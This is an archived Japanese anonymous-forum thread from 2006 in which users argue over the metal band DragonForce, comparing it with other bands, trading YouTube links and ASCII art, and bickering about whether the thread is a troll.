328 :名無しさんのみボーナストラック収録:2006/05/25(木) 00:14:32 ID:GBhYV3c60
まぁ、ドラフォの現ドラマーは元々Bal-Sagothのドラマーだったからなぁ・・・
Bal-Sagothじゃ、あの位速いのは無かったような気もするけど。
ドラムだけブラックのブラストビートでw

329 :名無しさんのみボーナストラック収録:2006/05/25(木) 11:53:35 ID:e5eKmMWb0
       / ̄ ̄ ヽ,          !\  /  ̄ ̄~:ヽ
      /        ',          ', ヽ/ {0}    :::':,
      .{0}  /¨`ヽ {0},           〉 i         :::::i
      l   ヽ._.ノ   ',          /   !       ::::::l
     ノ   `ー'′   ',         ' -‐'',l       .:::::,!

_ _ _ __ ___ __ _ _ __ _              
-==-===-======-=== !\  /  ̄ ̄ ~:ヽ _ノ
     ヾゝゞ    ,.::ゞヾ         ', ヽ/ {0}    :::':,  ヽ  バード
     ` ..      ;',           〉 i         :::::i  <   フレイムwwww
-=-===-==-==-===-==-./   !       ::::::l  / 
 ̄  ̄ ノ   `ー'′   ',  ̄  ̄  ̄  ̄  ' -‐'',l       .:::::,! /
                                      ̄ヽ

       / ̄ ̄ ヽ,          !\  /  ̄ ̄~:ヽ
      /        ',          ', ヽ/ {0}    :::':,
      .{0}  /¨`ヽ {0},           〉 i         :::::i
      l   ヽ._.ノ   ',          /   !       ::::::l
     ノ   `ー'′   ',         ' -‐'',l       .:::::,!




       / ̄ ̄ ヽ,               / ̄ ̄ ヽ
      /        ',             /        ',
      .{0}  /¨`ヽ {0},            .{0}  /¨`ヽ {0},
      l   ヽ._.ノ   ',           l   ヽ._.ノ   ',
     ノ   `ー'′   ',          ノ   `ー'′   ',

330 :名無しさんのみボーナストラック収録:2006/05/25(木) 13:35:03 ID:kxj9a5QQ0
>>328
Bal-Sagothはコンセプト重視だからね。
単に早いだけのバンドとは違うよ。

331 :名無しさんのみボーナストラック収録:2006/05/25(木) 14:49:41 ID:aI7hMHbeO
ドラフォは速いだけじゃないがな

332 :名無しさんのみボーナストラック収録:2006/05/25(木) 14:53:34 ID:LE0vUwd9O
キャッチーなメロディとスリリングな曲展開
も魅力なんだっけか

333 :名無しさんのみボーナストラック収録:2006/05/25(木) 15:31:01 ID:kqLLJR2X0
中華フレーバーを忘れるな

334 :名無しさんのみボーナストラック収録:2006/05/25(木) 17:37:20 ID:h2vjYo+Y0
ドラフォなんてX JAPANに比べたらクズもいいとこだろ

335 ::2006/05/25(木) 17:54:17 ID:lcKWjvGHO
ドラフォはまだ捨て曲無し!って言い切れるアルバムが無いと思う。三枚全部あるけど、段々とうまくなってきてると思うし、ギターソロとか良い曲もあるけど、何だか全部を好きになれない。みんなはどう思う?色々な立場から聞いてみたい。

336 :名無しさんのみボーナストラック収録:2006/05/25(木) 20:10:09 ID:GBhYV3c60
>>335
オレ的には、3rdが電子音っぽくて好きだww単にデジタルフェチなだけだけどw


337 ::2006/05/25(木) 20:52:36 ID:lcKWjvGHO
336
335だけど確かにデジタル感が良いよね。
一つ感じたのが、ドラフォも明るくてクサい曲も良いけど切ない感じのも増やしたほうが面白みが増すと思うのだが

338 :名無しさんのみボーナストラック収録:2006/05/25(木) 21:17:13 ID:SjIZzDVs0
でも結局ドラムの爆走で全曲同じに聞こえるw

339 :名無しさんのみボーナストラック収録:2006/05/25(木) 21:30:41 ID:YTFtP/y1O
たまにメロコアみたいに聴こえる

340 :メ〜〜〜〜〜トゴ〜〜〜〜〜:2006/05/25(木) 21:35:56 ID:n2jDr/4DO

貴様らドラフォのライブ行くのん?

341 :名無しさんのみボーナストラック収録:2006/05/26(金) 03:14:34 ID:9PymbGhe0
ドラフォはXのパクリ

紅とか

342 :名無しさんのみボーナストラック収録:2006/05/26(金) 03:58:59 ID:DsKWDdiaO
好きだけど車でアルバムかけてると疲れる。

343 :名無しさんのみボーナストラック収録:2006/05/26(金) 07:26:06 ID:bnxB+ivH0
展開が数パターンしかないのが痛いです。
技術は凄いが音楽はそんなもんじゃないです。ー
訴えかける物がないからインパクトに欠ける。
デビュー当初は凄いの出たーって思ったけど
一番好きなバンドって感じではなく機械的に凄いって感じの
際物バンド。 と個人的には思います。

344 :名無しさんのみボーナストラック収録:2006/05/26(金) 13:17:36 ID:MYVeYltWO
アルバムの1曲目しか好きになれない

345 :名無しさんのみボーナストラック収録:2006/05/26(金) 14:17:00 ID:2gxXVUsmO
みんな同じに聴こえる

346 :名無しさんのみボーナストラック収録:2006/05/26(金) 15:39:58 ID:bKqe6jiJO
ホエアドラゴンズルールもだめ?

347 :名無しさんのみボーナストラック収録:2006/05/26(金) 16:01:28 ID:e7u0SNh60
曲調を悲しい感じにすればいいと思う。

348 :名無しさんのみボーナストラック収録:2006/05/26(金) 18:17:07 ID:CPNGTKWl0
悲しく疾走か。
泣きながら家を飛び出す少年が思い浮かぶ。

349 :名無しさんのみボーナストラック収録:2006/05/26(金) 18:18:06 ID:ppodtLqnO
>>344
Valley Of The Damned
My Spirit Will Go On
Through The Fire And Flames

なるほど良曲ぞろいだ

350 :336:2006/05/26(金) 20:13:14 ID:qbKVc48k0
>>349
それが良曲なのは認める。

>>340
自分は名古屋行く。メタルとかラウド系のバンドのライブあんまし見たこと無いから、
まぁ、来るんだし行こうと思って行くよ。


351 :名無しさんのみボーナストラック収録:2006/05/26(金) 23:23:53 ID:9YQkF7sa0
http://pya.cc/pyaimg/pimgstop.php?imgid=14232

ドラフォ超えてるぞ

352 :名無しさんのみボーナストラック収録:2006/05/27(土) 20:24:08 ID:MtmRcwqpO
>>342
じゃかけるなよタコ、わざわざ疲れるために聞くんなら聞くな

353 :名無しさんのみボーナストラック収録:2006/05/31(水) 18:19:41 ID:DuOwSyRyO
フューリーいいよフューリー

354 :名無しさんのみボーナストラック収録:2006/06/01(木) 01:41:39 ID:UdAVtaQ50
ドラフォは神です

355 :名無しさんのみボーナストラック収録:2006/06/01(木) 02:20:03 ID:LB7DnzE5O
超マイナーだけどノストラダスってバンドがあるんだけど速さだけならドラフォに匹敵すると個人的に思う。是非聞いてみて探すのむずいけど。

356 :名無しさんのみボーナストラック収録:2006/06/01(木) 02:34:00 ID:++hvsSHsO
>>355
いなかっぺ大将みたいなバンド名だな

357 :名無しさんのみボーナストラック収録:2006/06/01(木) 13:00:20 ID:mnvvmSDeO
スレイヤーってドラフォより速いね

好きじゃないけど

358 :名無しさんのみボーナストラック収録:2006/06/01(木) 13:10:31 ID:NZAQf2ozO
スレイヤーわドラフォより速いって確定されてる。
 
351 バンド名ゆってや

359 :名無しさんのみボーナストラック収録:2006/06/01(木) 15:40:07 ID:T2MSVles0
正直ドラフォの歌詞はダサいと思いませんか?

360 :名無しさんのみボーナストラック収録:2006/06/01(木) 15:51:58 ID:4GPkwt6hQ
ドラゴン(笑)

361 :名無しさんのみボーナストラック収録:2006/06/01(木) 15:52:09 ID:6NU4ttIi0
>>351
死ぬほどわざとらしい安易なメロだなそれ
やっぱ日本人センス悪ぃわ・・

362 :名無しさんのみボーナストラック収録:2006/06/01(木) 16:12:31 ID:YGNNBcll0
ドラフォより下は
ねーな。

363 :名無しさんのみボーナストラック収録:2006/06/01(木) 18:14:34 ID:jm2PM/7+0
>>351
それ俺がメタルに興味持つきっかけになった曲じゃん
どうしてメタラーはこういうメロを嫌うんだろう?
そういう人って昔の邦楽とか聴けたもんじゃないだろうな

364 :名無しさんのみボーナストラック収録:2006/06/01(木) 19:20:55 ID:xj/6FXE80
俺は曲っつーかこのフラッシュ自体がわざとらしくってクソ大嫌い。
それにつられて曲もむかついてくる気がしなくもない。

365 :名無しさんのみボーナストラック収録:2006/06/01(木) 19:36:20 ID:jm2PM/7+0
確かに流れる映像で曲の印象って変わるよね

366 :名無しさんのみボーナストラック収録:2006/06/01(木) 20:32:16 ID:NZAQf2ozO
だから351のバンド名ゆえやボケカス

367 :名無しさんのみボーナストラック収録:2006/06/01(木) 20:48:48 ID:D+NRt5uZ0
クリティカルミノスっていうスペインのバンド。
B級メロスピだからセンスは悪い。

368 :名無しさんのみボーナストラック収録:2006/06/01(木) 22:00:09 ID:XlP8XVkT0
ttp://www.youtube.com/watch?v=qpq1znVoE3o&search=death


こいつらすげeeeeeeee

369 :名無しさんのみボーナストラック収録:2006/06/01(木) 22:06:30 ID:3xU8B/9H0
>>366
403。Muzieで曲発表してる人。ちなみに個人だよ。
ってか、フラッシュに書いてあった。よくフラッシュ見ろYO。

370 :名無しさんのみボーナストラック収録:2006/06/02(金) 00:28:18 ID:u+fMjOtB0
>>363
それはあんたがメロスパーだからだょ。
もうちょい精進したら分かると思うけど(笑)

371 :名無しさんのみボーナストラック収録:2006/06/02(金) 01:21:13 ID:n9DoIU+00
>>370
普通の人って昔好きだった曲はドンドン嫌いになっていくの?
なんかそれって悲しいな

372 :名無しさんのみボーナストラック収録:2006/06/02(金) 03:30:02 ID:JEAWwoPa0
恥ずかしい過去を消したいんだろ

373 :名無しさんのみボーナストラック収録:2006/06/02(金) 19:16:51 ID:gLZQlyvt0
>>351
なんか声質が嫌だ。

二倍速のALFEEをキモくしたみたいな印象。
ALFEEは好きだが。

374 :名無しさんのみボーナストラック収録:2006/06/06(火) 19:05:42 ID:o0nBo2A60
>>346
いい 

375 :名無しさんのみボーナストラック収録:2006/06/06(火) 21:15:18 ID:UXcMV74w0
結局トシも癒しの音楽にたどり着いたんだな

376 :名無しさんのみボーナストラック収録:2006/06/07(水) 02:54:01 ID:/tFYXFqtO
ぁあ、、ハァハァ
ドラゴンフォースってなんでこんないいんだろう

あの「夫のメタル系のCDすてたら夫がおかしくなった」ていうネタスレみたいに、もし俺に将来嫁ができてそんでドラふぉのCDすてられたら、、、、(#@Д@)

377 :名無しさんのみボーナストラック収録:2006/06/07(水) 20:59:15 ID:hktjFbzlO
お前の将来に嫁とか言う単語が出てくるのか?

378 :名無しさんのみボーナストラック収録:2006/06/09(金) 00:14:06 ID:3CG0A4NoO
ドラフォ聞くにはブルデスを聞く時以上の精神力が必要。疲れる…

379 :名無しさんのみボーナストラック収録:2006/06/09(金) 01:18:24 ID:BCbtwS6e0

http://uk.music.yahoo.com/ar-6311340-videos--Dragonforce
ソロパート抽出
http://www.youtube.com/watch?v=tqYjqyHnVNs&search=dragonforce

380 :名無しさんのみボーナストラック収録:2006/06/09(金) 20:03:34 ID:fTdoDmbb0
http://www.youtube.com/watch?v=R4raG5wZZUg&search=dragonforce
キーボードソロ。名前どおり、本当テクノwwww
ってかファミコンwww

381 :名無しさんのみボーナストラック収録:2006/06/10(土) 07:05:06 ID:uajXKBUZ0
>>380
サブカルヲタが主催してるようなクラブ・イヴェントで受けそうな音だな。

シンプソンズのテーマが入ると、ドリーム・シアターを思い出してしまうw

382 :名無しさんのみボーナストラック収録:2006/06/15(木) 22:07:06 ID:xSmlj+yGO
FURYいいよFURY
あのピロピロがたまらん

383 :名無しさんのみボーナストラック収録:2006/06/15(木) 22:33:26 ID:huNoJWxb0
>>351
このフラッシュ嫌い
って見て速攻思ったしボーカルの声も好きじゃなかったけど
後半にはフラッシュに感動していて曲も好きになっていた
詳細きぼん

384 :名無しさんのみボーナストラック収録:2006/06/15(木) 22:53:15 ID:huNoJWxb0
↑の者です
自己解決しましたw

385 :名無しさんのみボーナストラック収録:2006/06/16(金) 00:48:49 ID:ZWeTAZL10
>>383
なんかわかるわ
初めて聴いたときは
ちょっと怖い音楽っぽい印象受けね?
サビは明るいからすぐにそんな考えは吹っ飛ぶけど

386 :名無しさんのみボーナストラック収録:2006/06/23(金) 13:26:10 ID:1vy1GufGO
チルボドは?

387 :名無しさんのみボーナストラック収録:2006/06/23(金) 18:12:01 ID:awjrrnRY0
なんで誰も1の自演を指摘しなかったの?

388 :名無しさんのみボーナストラック収録:2006/06/24(土) 00:25:11 ID:LBzWx/ka0
ソロがながすぎなんですがさすがに。

389 :名無しさんのみボーナストラック収録:2006/06/26(月) 20:42:34 ID:r8igih4R0
SPASTIC INK

390 :名無しさんのみボーナストラック収録:2006/06/26(月) 22:16:55 ID:X1Sylyiv0
The Darkness



とUnderoathの皿を、
doragonforceの新作とともに買おうとおもてるよ

391 :名無しさんのみボーナストラック収録:2006/06/27(火) 10:32:37 ID:iRBdb6/QO
ドラフォの新曲?いつでるんだ?

392 :名無しさんのみボーナストラック収録:2006/07/01(土) 23:06:45 ID:JjscNKg80
>>391

http://www.youtube.com/watch?v=XF-VhrWUUJU&search=AxCx

393 :名無しさんのみボーナストラック収録:2006/07/02(日) 12:04:37 ID:qYn8OQKd0
>>392
随分音楽性変えたな。

394 :名無しさんのみボーナストラック収録:2006/07/02(日) 13:28:04 ID:R800RgNE0
>>1
俺もドラフォ好きだけど
Impellitteri、Exodus、InFlamesとかも普通に好きだ。
まぁこの辺りは既に聴いてるよな…

395 :名無しさんのみボーナストラック収録:2006/07/08(土) 18:12:18 ID:BXP8Njtj0
           __,,,,.....,,,,_ 
   .    ,,.r ''"     `゙'.'' ‐、
    .__,/             . .゙'、       __________
    /         .   . _  . ヽ.    /
   (    /(   ./ヽ. . ( .\  . i    |  
.    \  .( ヽ  (  ´''ー-ゝ l  .i.   <  Nocturnal Rites はガチ
     i`.ー-ゝ. ´''ー-ゝ  ̄`  i . !     | 
    ハ. .,'てゝ  .  .'てゝ  .l√l      |  
    {ハ ゝ_ソ  _   ゝ_ソ   ソ      \___
     i  ` ` ヾ   ` `  ィ ̄\        
     ヽ、  丶二i    '´l    '、
       >  、  _ ィ、´  ヽ、:l`' ‐ゝ
      /    √    //゙''''ー'''ヽ, 

396 :名無しさんのみボーナストラック収録:2006/07/13(木) 00:17:35 ID:k1DVGJM50
http://forcedexistence.com/pics/what.jpg

397 :名無しさんのみボーナストラック収録:2006/07/15(土) 11:21:24 ID:0R4b2j8H0
クリントンランページジャクソン

398 :名無しさんのみボーナストラック収録:2006/07/15(土) 16:04:01 ID:KwxODj5XO
ドラフォきくんだったらデスメタルきいた方がマシだろ

399 :名無しさんのみボーナストラック収録:2006/07/15(土) 18:48:21 ID:j/JdBtPMO
はいはいかえれかえれ

400 :名無しさんのみボーナストラック収録:2006/07/22(土) 01:43:21 ID:/QVk+Agl0
栗きんとんランページシャンソン

401 :名無しさんのみボーナストラック収録:2006/07/22(土) 05:38:02 ID:tnmlYyAkO
>>1
おまえはとりあえずドラフォをしばらく聴いてろ!
そしてデスメタルの良さがいつかわかった時、お前は
お前はもう二度とドラフォをきけなくなっちまうぜ。

402 :名無しさんのみボーナストラック収録:2006/07/22(土) 07:13:25 ID:OMTmB0MV0
ギターメインのバンドってボーカルがつまらんな
インペリもそう。それなりに上手けりゃいいじゃんみたいなノリだし
歌わしている感漂い過ぎで可哀想になってくるわ

中華テイストを盛り込んだギターもダサいことこの上なし
どうよ俺の速引きスゲーだろ?ってな具合のピロピロで長すぎなギターソロも楽曲ぶち壊しすぎ
空気読めよロンゲ
バッキングのミュート刻みも全然マッチングしてねぇしバカ丸出し

所詮は速けりゃなんでもイイ失踪厨の聴くバカスピ

403 :名無しさんのみボーナストラック収録:2006/07/22(土) 08:56:26 ID:AUwrbuL/0
>>401
デスもブラックも聴いてるけどドラフォ聴いててごめんなさい

404 :名無しさんのみボーナストラック収録:2006/07/22(土) 16:05:40 ID:PaPk6uRM0
>>402
じゃ、おすすめのバンド教えてくれよ。
どうせ、言えないだろ?

405 :名無しさんのみボーナストラック収録:2006/07/22(土) 17:43:01 ID:tnmlYyAkO
マジレスすると俺はメロスピはだいぶ前に卒業したのだが友達に
ひさびさに聴けるメロスピバンドが登場したと薦められてドラフォをきいた。
感想はなかなか良かった。というよりメロスピの枠に限って評価するなら最強といっても過言ではない
と思った。ただあくまでメロスピの枠に限ればという話だ。
俺はメタルという広い範囲で考えればメタリカの初期やパンテラの方が好きだ。
>1はメロスピの範囲でしかメタルを評価できないのではないか?
そうだとしたら>1は今何を薦められてもドラフォしか評価できない。
よってこの議論を無駄だという事だ。1つのバンドにそんだけ熱をあげられる
事は素晴らしい事だと思うからとりあえず飽きるまでドラフォをきいていろ。
そのうちほかのバンドの良さがわかるかもしれないしわからなかったら
永遠にドラフォを崇拝していればいい。

406 :名無しさんのみボーナストラック収録:2006/07/22(土) 23:45:42 ID:/OB+9nC+0
http://59.106.37.26/VJ/label/ssv/main/img/LL00451.jpg

407 :名無しさんのみボーナストラック収録:2006/07/23(日) 05:21:54 ID:tyEKZp4RO
自分のイチモツにそっと触れ
まで読んだ。

つーか、ドラフォを超えないバンドないの?

408 :名無しさんのみボーナストラック収録:2006/07/23(日) 08:18:58 ID:UpCnlfFOO
なんだ単なる釣りスレだったのか。

409 :名無しさんのみボーナストラック収録:2006/07/23(日) 08:19:47 ID:eOZmXg8M0
>>404
なにマジになってんだよ
おすすめバンドなんてコルピクラーニに決まってるだろw
これだからメロスピしか聴かんヤツは手間が掛かる

410 :名無しさんのみボーナストラック収録:2006/07/23(日) 08:32:26 ID:UpCnlfFOO
たしかにドラフォとコルピはバカさ加減が似ているなW
でも無駄だよ1はドラフォしか聞く気がねーしデス声はお子ちゃまだから
きけないんだとWWW

久々にキモメロスパーを見たなぁ。と釣られてみる。

411 :名無しさんのみボーナストラック収録:2006/07/23(日) 08:41:31 ID:jlwWuz380
ピロピロピロピロピロピロ♪
ドコドコドコドコドコドコ♪

確かにある意味ドラフォを超えるバンドはそうそう無いわなw


412 :名無しさんのみボーナストラック収録:2006/07/23(日) 09:10:10 ID:s66mjly20
ラプソディいいよラプソディ

ルカのギターは美しい

413 :名無しさんのみボーナストラック収録:2006/07/23(日) 23:02:49 ID:Y3Ya9Ke30
>>409
逃げてんじゃんw

414 :名無しさんのみボーナストラック収録:2006/07/24(月) 01:28:31 ID:16IzZtXk0
ごめん、コルピじゃ歯が立たないみたいだね
でもこのNINJA MAGICってバンドなら遥かに凌駕できると思うんだ
http://www.ninjamagic.tk/

415 :名無しさんのみボーナストラック収録:2006/07/24(月) 06:40:04 ID:k1dSF00i0
出たよNINJA MAGICwwwwwwwwww

416 :名無しさんのみボーナストラック収録:2006/07/24(月) 11:03:46 ID:9o8NPv6L0
ninja magicは普通にカッコイイよ!!
頑張ってる感がたまらねえ

417 :名無しさんのみボーナストラック収録:2006/07/25(火) 05:54:55 ID:yFDv7q/bO
>>1
オレンジレンジって知ってる?君ならきっと気にいると思うよ!

でもドラゴンフォースより複雑かも知れないから君には理解できないか
もしれないけど聞いてみる価値はあると思うよ。

418 :名無しさんのみボーナストラック収録:2006/07/25(火) 06:56:01 ID:OfSGPTEm0
>>417
全然共通点がわからんw
でも若者に受けそうな雰囲気がどちらにもある

419 :名無しさんのみボーナストラック収録:2006/07/25(火) 15:46:36 ID:BKSf12vb0
釣りにきまってんだろカス

420 :名無しさんのみボーナストラック収録:2006/07/25(火) 21:22:03 ID:rBbV7VEvO
間違ってもDRAGONFORCEは曲をパクったりなんかしません><;;;;;;




と釣られてみる

421 :名無しさんのみボーナストラック収録:2006/07/27(木) 01:46:26 ID:GzNgE0e6O
>>1の特徴
人にきいておいてバンドを挙げると感謝どころかそのバンドよりドラフォ
のほうが勝ってると力説する。
結論
実はドラフォを通じて喧嘩売ってるだけ。

422 :名無しさんのみボーナストラック収録:2006/07/27(木) 16:00:31 ID:GzNgE0e6O
マジレスするとBAL-SAGOTHなんてどうだ?ドラフォのドラムがいたバンドだし
デス声だけど聞きやすい部類のデス声だぞ!

ドラフォとかラプソよりクサクサで目をつぶれば宇宙にいけるぞ(笑)

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)